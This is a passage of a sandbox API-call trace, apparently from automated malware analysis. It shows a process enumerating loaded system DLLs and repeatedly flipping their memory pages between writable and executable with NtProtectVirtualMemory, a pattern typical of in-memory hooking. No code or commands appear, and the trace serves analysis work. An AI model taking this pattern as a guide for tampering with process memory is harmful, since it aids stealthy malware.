OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.595] GetCurrentProcess () returned 0xffffffff [0053.595] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0048, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.596] GetCurrentProcess () returned 0xffffffff [0053.596] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0048, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.596] GetCurrentProcess () returned 0xffffffff [0053.596] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0050, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.596] GetCurrentProcess () returned 0xffffffff [0053.596] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0050, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.597] GetCurrentProcess () returned 0xffffffff [0053.597] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0070, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.597] GetCurrentProcess () returned 0xffffffff [0053.597] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0070, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.597] GetCurrentProcess () returned 0xffffffff [0053.597] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00a0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.597] GetCurrentProcess () returned 0xffffffff [0053.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00a0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.598] GetCurrentProcess () returned 0xffffffff [0053.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00a4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.598] GetCurrentProcess () returned 0xffffffff [0053.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00a4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.598] GetCurrentProcess () returned 0xffffffff [0053.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00a8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.599] GetCurrentProcess () returned 0xffffffff [0053.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00a8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.599] GetCurrentProcess () returned 0xffffffff [0053.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.599] GetCurrentProcess () returned 0xffffffff [0053.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.599] GetCurrentProcess () returned 0xffffffff [0053.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00cc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00cc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00d0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00d0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00d4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b00d4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0108, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.602] GetCurrentProcess () returned 0xffffffff [0053.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x770b0108, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x770b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.602] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.603] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.603] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.603] GetModuleFileNameA (in: hModule=0x76c60000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\LPK.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")) returned 0x1b [0053.603] GetCurrentProcess () returned 0xffffffff [0053.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c6103c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c61000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.603] GetCurrentProcess () returned 0xffffffff [0053.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c6103c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c61000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.603] GetCurrentProcess () returned 0xffffffff [0053.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c61044, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c61000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.604] GetCurrentProcess () returned 0xffffffff [0053.604] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c61044, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c61000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.604] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.605] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.605] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.605] GetModuleFileNameA (in: hModule=0x76c70000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\USP10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")) returned 0x1d [0053.605] GetCurrentProcess () returned 0xffffffff [0053.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c710d8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.605] GetCurrentProcess () returned 0xffffffff [0053.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c710d8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.605] GetCurrentProcess () returned 0xffffffff [0053.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c710e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c710e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c710e4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c710e4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c710f8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.607] GetCurrentProcess () returned 0xffffffff [0053.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c710f8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.607] GetCurrentProcess () returned 0xffffffff [0053.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71130, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.607] GetCurrentProcess () returned 0xffffffff [0053.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71130, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.607] GetCurrentProcess () returned 0xffffffff [0053.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71134, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.607] GetCurrentProcess () returned 0xffffffff [0053.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71134, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.608] GetCurrentProcess () returned 0xffffffff [0053.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71138, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.608] GetCurrentProcess () returned 0xffffffff [0053.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71138, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.608] GetCurrentProcess () returned 0xffffffff [0053.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c7113c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.608] GetCurrentProcess () returned 0xffffffff [0053.608] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c7113c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.609] GetCurrentProcess () returned 0xffffffff [0053.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71164, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.609] GetCurrentProcess () returned 0xffffffff [0053.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71164, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.609] GetCurrentProcess () returned 0xffffffff [0053.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71180, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.609] GetCurrentProcess () returned 0xffffffff [0053.609] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71180, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.610] GetCurrentProcess () returned 0xffffffff [0053.610] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71184, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.610] GetCurrentProcess () returned 0xffffffff [0053.610] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71184, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.610] GetCurrentProcess () returned 0xffffffff [0053.610] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71188, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.610] GetCurrentProcess () returned 0xffffffff [0053.610] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71188, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.611] GetCurrentProcess () returned 0xffffffff [0053.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71190, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.611] GetCurrentProcess () returned 0xffffffff [0053.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c71190, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.611] GetCurrentProcess () returned 0xffffffff [0053.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c7119c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.611] GetCurrentProcess () returned 0xffffffff [0053.611] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76c7119c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76c71000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.612] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.612] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.612] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.612] GetModuleFileNameA (in: hModule=0x76f90000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0053.613] GetCurrentProcess () returned 0xffffffff [0053.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f910b8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.613] GetCurrentProcess () returned 0xffffffff [0053.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f910b8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.613] GetCurrentProcess () returned 0xffffffff [0053.613] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f910f4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.613] GetCurrentProcess () returned 0xffffffff [0053.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f910f4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.614] GetCurrentProcess () returned 0xffffffff [0053.614] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f91100, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.615] GetCurrentProcess () returned 0xffffffff [0053.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f91100, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.615] GetCurrentProcess () returned 0xffffffff [0053.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f9111c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.615] GetCurrentProcess () returned 0xffffffff [0053.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f9111c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.615] GetCurrentProcess () returned 0xffffffff [0053.615] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f91128, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.616] GetCurrentProcess () returned 0xffffffff [0053.616] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f91128, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.616] GetCurrentProcess () returned 0xffffffff [0053.616] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f9122c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.616] GetCurrentProcess () returned 0xffffffff [0053.616] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f9122c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.616] GetCurrentProcess () returned 0xffffffff [0053.616] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f91244, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.617] GetCurrentProcess () returned 0xffffffff [0053.617] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76f91244, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76f91000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.617] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.618] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.618] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.618] GetModuleFileNameA (in: 